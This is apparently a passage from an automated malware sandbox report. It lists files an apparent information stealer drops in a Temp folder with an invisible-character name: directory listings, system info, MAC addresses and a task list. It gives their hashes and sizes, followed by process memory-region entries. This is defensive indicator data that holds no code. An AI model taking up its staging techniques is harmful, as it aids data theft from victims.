                                          d5c31fb9906e88326ad141f2cc092e90ff5c02db3bca194955220a8a630a94f5

                                          SHA512

                                          e8f9ffd40bd4fb4c7bc90769fbc3b0eae1d692f99caba5eb25cc4dd27de5c7f500f9cc65fa7517e77fdb04b185c1526e21ba75f12aefd55feae4ea4ec9900f30

                                        • C:\Users\Admin\AppData\Local\Temp\‏ ​ ‌‏​   \Directories\Desktop.txt

                                          Filesize

                                          525B

                                          MD5

                                          f6dbe0aa7bc2710b4de6e2cd0bc6fd01

                                          SHA1

                                          b565b37f3d358afb156314f94d7ffa176cd0c13f

                                          SHA256

                                          54a7528f73ff268d0734662e5a1f28326f1fddab2fccccbaf91f8dee2281bafe

                                          SHA512

                                          f47c1e1ebff2f7313df73fa6fc505874f3480b80294d473740889e90eb797d770531195df668565344fcf47a3ce6e6e56c72a2061c95ef8892e42574df0a617c

                                        • C:\Users\Admin\AppData\Local\Temp\‏ ​ ‌‏​   \Directories\Documents.txt

                                          Filesize

                                          654B

                                          MD5

                                          17f39790fed69a4a871c17310266ce8a

                                          SHA1

                                          2c5098e104097fcb9747ea672131220ff3880221

                                          SHA256

                                          044db72af41855bb5c7a21c73899d528ef489cb56e39c23f1f0d84eaaf5859ca

                                          SHA512

                                          fb2947f5f8ec5675eb01cce9183c7ee743f46e03becb8060278bbce576640b3803a9a84d80e46ae14b73ed726b107970f3958a9b783b00889d10ceac33fba207

                                        • C:\Users\Admin\AppData\Local\Temp\‏ ​ ‌‏​   \Directories\Downloads.txt

                                          Filesize

                                          716B

                                          MD5

                                          471bbc54a97cba6b61807379fc28d886

                                          SHA1

                                          173d489202e7428875690cac9101aea04a8ddb9f

                                          SHA256

                                          cdf104e66a03b81014e0f7e06ebde41782ce22a8845f6635070ead2bad0ed80e

                                          SHA512

                                          b540449a13bb3dbc968442f2410dd0e35afbf87d3f87e8a3fbc23d7e1427295d85a07e2ef3b03dd9cc3292b8dc9a43522967eca199f5bd163b9ebe6d1e1a89fa

                                        • C:\Users\Admin\AppData\Local\Temp\‏ ​ ‌‏​   \Directories\Music.txt

                                          Filesize

                                          273B

                                          MD5

                                          079736ef4a89ca148ab2904160e4a94a

                                          SHA1

                                          14637310d2191517dc139fb5a223c12487286031

                                          SHA256

                                          afbb421bda247bf0bbac8aeee69addab289be646c5968dcfc4f2e4b8f0cffe70

                                          SHA512

                                          a91b8ae7058e32af6de86775c2952fec890ce61724eda01e3d8091e3b56e52092f36a7b177de836c1517fc0bcf5911700c8b0d4f8a89a7a86ef936d69b0754b1

                                        • C:\Users\Admin\AppData\Local\Temp\‏ ​ ‌‏​   \Directories\Pictures.txt

                                          Filesize

                                          562B

                                          MD5

                                          d47ae2b64b4e9db07038c4fcec2b2754

                                          SHA1

                                          44d9bdaf677e892d5950ce66c0e7a39f1c744d7f

                                          SHA256

                                          fb4a961a44007569ce14f147c6e02ed41e04f7f2c701bc7075a7a4e259cb52fd

                                          SHA512

                                          7a5b0efe974b675d8d66b29e4f0b243d5cce7df680be38d9d4faaa68831d052ee8c834fac3a461423796a5333653368c47b096c489292b7ffc8b505fc4268ba5

                                        • C:\Users\Admin\AppData\Local\Temp\‏ ​ ‌‏​   \Directories\Videos.txt

                                          Filesize

                                          30B

                                          MD5

                                          e140e10b2b43ba6f978bee0aa90afaf7

                                          SHA1

                                          bbbeb7097ffa9c2daa3206b3f212d3614749c620

                                          SHA256

                                          c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

                                          SHA512

                                          df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

                                        • C:\Users\Admin\AppData\Local\Temp\‏ ​ ‌‏​   \System\MAC Addresses.txt

                                          Filesize

                                          232B

                                          MD5

                                          da3ad35c822cff5029f3334191c81a67

                                          SHA1

                                          622fd97e5de44462e34cd58e641f90046473e170

                                          SHA256

                                          379f5ea0ab2e836b34de558ad202f34ed3cba08d34e9cd6143964cf0ccce3038

                                          SHA512

                                          d1d18a679165e8f96f315803698db76c39110941424b1aa00845de7f10728df325161436373c09db59196a6a2a4c2446f1f9ec1c805dac2f38d8b2f454957616

                                        • C:\Users\Admin\AppData\Local\Temp\‏ ​ ‌‏​   \System\System Info.txt

                                          Filesize

                                          2KB

                                          MD5

                                          ceeb2e4fceee431a379318e8adbb86a7

                                          SHA1

                                          9d0f0ce3449352a8966d999d818a091138f61ad3

                                          SHA256

                                          2f2a1bf8c80b49626db982f5d7630c57710270fb8f261eb4faef1dc88d2c3d9b

                                          SHA512

                                          357f0ed4494c28d2a5f6299f602afea502839ff70737394b0ed83fa6e4641407f7e3c65e2816ec72812e1a66484d299136310863c48aa10e5e38b2c1696da97d

                                        • C:\Users\Admin\AppData\Local\Temp\‏ ​ ‌‏​   \System\Task List.txt

                                          Filesize

                                          11KB

                                          MD5

                                          3e0ebf0dc55e15ef602f9a50eb7feee8

                                          SHA1

                                          82c1a133f70ab850529e44064e7afe0e77c2f3e9

                                          SHA256

                                          612e8b27126483796cabeba1cbf176be79c09f0806abe5b0e2204241f2bd66a3

                                          SHA512

                                          3552bed0c43e73526ebd393eb7af55ca581d7d991c6d7539cfa7b9e3f39bae5608cb35dd2ab045af00b786258182995577966d254abf9935291263a4cc73f055

                                        • memory/2636-102-0x0000019AD4A00000-0x0000019AD4A22000-memory.dmp

                                          Filesize

                                          136KB

                                        • memory/2636-87-0x00007FFE6AE50000-0x00007FFE6B045000-memory.dmp

                                          Filesize

                                          2.0MB

                                        • memory/2636-86-0x00007FFE6AE50000-0x00007FFE6B045000-memory.dmp

                                          Filesize

                                          2.0MB

                                        • memory/2636-109-0x00007FFE6AE50000-0x00007FFE6B045000-memory.dmp

                                          Filesize

                                          2.0MB

                                        • memory/4492-70-0x00007FFE4D010000-0x00007FFE4D47E000-memory.dmp

                                          Filesize

                                          4.4MB

                                        • memory/4492-60-0x00007FFE4D720000-0x00007FFE4D891000-memory.dmp

                                          Filesize

                                          1.4MB

                                        • memory/4492-77-0x00007FFE5CBD0000-0x00007FFE5CBE4000-memory.dmp

                                          Filesize

                                          80KB

                                        • memory/4492-76-0x00007FFE63F80000-0x00007FFE63F8F000-memory.dmp

                                          Filesize

                                          60KB

                                        • memory/4492-82-0x00007FFE625F0000-0x00007FFE62609000-memory.dmp

                                          Filesize

                                          100KB

                                        • memory/4492-83-0x00007FFE5BEB0000-0x00007FFE5BFC8000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/4492-85-0x00007FFE4D720000-0x00007FFE4D891000-memory.dmp

                                          Filesize

                                          1.4MB

                                        • memory/4492-113-0x00007FFE5D560000-0x00007FFE5D579000-memory.dmp

                                          Filesize

                                          100KB

                                        • memory/4492-71-0x00007FFE5C220000-0x00007FFE5C2D8000-memory.dmp

                                          Filesize

                                          736KB

                                        • memory/4492-124-0x00007FFE5CBF0000-0x00007FFE5CC1E000-memory.dmp

                                          Filesize

                                          184KB

                                        • memory/4492-73-0x00007FFE4CC90000-0x00007FFE4D005000-memory.dmp

                                          Filesize

                                          3.5MB

                                        • memory/4492-160-0x00007FFE5C220000-0x00007FFE5C2D8000-memory.dmp

                                          Filesize

                                          736KB

                                        • memory/4492-161-0x000001DE990F0000-0x000001DE99465000-memory.dmp

                                          Filesize

                                          3.5MB

                                        • memory/4492-74-0x00007FFE63300000-0x00007FFE63324000-memory.dmp

                                          Filesize

                                          144KB

                                        • memory/4492-173-0x00007FFE4CC90000-0x00007FFE4D005000-memory.dmp

                                          Filesize

                                          3.5MB

                                        • memory/4492-72-0x000001DE990F0000-0x000001DE99465000-memory.dmp

                                          Filesize

                                          3.5MB

                                        • memory/4492-65-0x00007FFE613C0000-0x00007FFE613CD000-memory.dmp

                                          Filesize

                                          52KB

                                        • memory/4492-80-0x00007FFE5CCC0000-0x00007FFE5CCCD000-memory.dmp

                                          Filesize

                                          52KB

                                        • memory/4492-84-0x00007FFE624A0000-0x00007FFE624BF000-memory.dmp

                                          Filesize

                                          124KB

                                        • memory/4492-66-0x00007FFE5CBF0000-0x00007FFE5CC1E000-memory.dmp

                                          Filesize

                                          184KB

                                        • memory/4492-62-0x00007FFE5D560000-0x00007FFE5D579000-memory.dmp

                                          Filesize

                                          100KB

                                        • memory/4492-79-0x00007FFE5CD60000-0x00007FFE5CD8D000-memory.dmp

                                          Filesize

                                          180KB

                                        • memory/4492-58-0x00007FFE624A0000-0x00007FFE624BF000-memory.dmp

                                          Filesize

                                          124KB

                                        • memory/4492-56-0x00007FFE625F0000-0x00007FFE62609000-memory.dmp

                                          Filesize

                                          100KB

                                        • memory/4492-54-0x00007FFE5CD60000-0x00007FFE5CD8D000-memory.dmp

                                          Filesize

                                          180KB

                                        • memory/4492-32-0x00007FFE63F80000-0x00007FFE63F8F000-memory.dmp

                                          Filesize

                                          60KB

                                        • memory/4492-29-0x00007FFE63300000-0x00007FFE63324000-memory.dmp

                                          Filesize

                                          144KB

                                        • memory/4492-210-0x00007FFE4D010000-0x00007FFE4D47E000-memory.dmp

                                          Filesize

                                          4.4MB

                                        • memory/4492-224-0x00007FFE5BEB0000-0x00007FFE5BFC8000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/4492-235-0x00007FFE5C220000-0x00007FFE5C2D8000-memory.dmp

                                          Filesize

                                          736KB

                                        • memory/4492-234-0x00007FFE4D720000-0x00007FFE4D891000-memory.dmp

                                          Filesize

                                          1.4MB

                                        • memory/4492-233-0x00007FFE613C0000-0x00007FFE613CD000-memory.dmp

                                          Filesize

                                          52KB

                                        • memory/4492-232-0x00007FFE5D560000-0x00007FFE5D579000-memory.dmp

                                          Filesize

                                          100KB

                                        • memory/4492-231-0x00007FFE5CBF0000-0x00007FFE5CC1E000-memory.dmp

                                          Filesize

                                          184KB

                                        • memory/4492-230-0x00007FFE624A0000-0x00007FFE624BF000-memory.dmp

                                          Filesize

                                          124KB

                                        • memory/4492-229-0x00007FFE625F0000-0x00007FFE62609000-memory.dmp

                                          Filesize

                                          100KB

                                        • memory/4492-228-0x00007FFE5CD60000-0x00007FFE5CD8D000-memory.dmp

                                          Filesize

                                          180KB

                                        • memory/4492-227-0x00007FFE63F80000-0x00007FFE63F8F000-memory.dmp

                                          Filesize

                                          60KB

                                        • memory/4492-226-0x00007FFE63300000-0x00007FFE63324000-memory.dmp

                                          Filesize

                                          144KB

                                        • memory/4492-225-0x00007FFE4CC90000-0x00007FFE4D005000-memory.dmp

                                          Filesize

                                          3.5MB

                                        • memory/4492-223-0x00007FFE5CCC0000-0x00007FFE5CCCD000-memory.dmp

                                          Filesize

                                          52KB

                                        • memory/4492-222-0x00007FFE5CBD0000-0x00007FFE5CBE4000-memory.dmp

                                          Filesize

                                          80KB

                                        • memory/4492-25-0x00007FFE4D010000-0x00007FFE4D47E000-memory.dmp

                                          Filesize

                                          4.4MB